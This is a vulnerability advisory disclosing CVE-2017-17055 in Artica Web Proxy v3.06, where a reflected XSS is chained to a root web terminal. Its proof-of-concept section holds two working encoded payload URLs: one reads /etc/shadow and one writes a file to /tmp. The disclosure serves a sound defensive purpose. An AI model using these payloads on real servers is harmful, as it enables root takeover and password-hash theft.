90 lines
No EOL
3.4 KiB
Text
90 lines
No EOL
3.4 KiB
Text
[+] Credits: John Page (aka Hyp3rlinX)
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
|
|
[+] ISR: ApparitionSec
|
|
|
|
|
|
|
|
Vendor:
|
|
=======
|
|
www.articatech.com
|
|
|
|
|
|
|
|
Product:
|
|
=========
|
|
Artica Web Proxy v.3.06.112216
|
|
|
|
|
|
Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution,
|
|
usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past
|
|
10 years as an Open Source Project to help SMEs and public bodies protect both their organizations
|
|
and employees from risks posed by the Internet.
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
===================
|
|
Remote Code Execution
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2017-17055
|
|
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root.
|
|
However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'.
|
|
|
|
Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker
|
|
supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server
|
|
abusing the system.terminal.php functionality. Result is attacker takeover of the artica server.
|
|
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
1) Steal artica Server "/etc/shadow" password file.
|
|
|
|
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E
|
|
|
|
2) Write file 'PWN' to /tmp dir.
|
|
|
|
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Remote
|
|
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
High
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: November 28, 2017
|
|
Vendor Confirms Vulnerability : November 28, 2017
|
|
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
|
|
December 1, 2017 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c).
|
|
|
|
hyp3rlinx |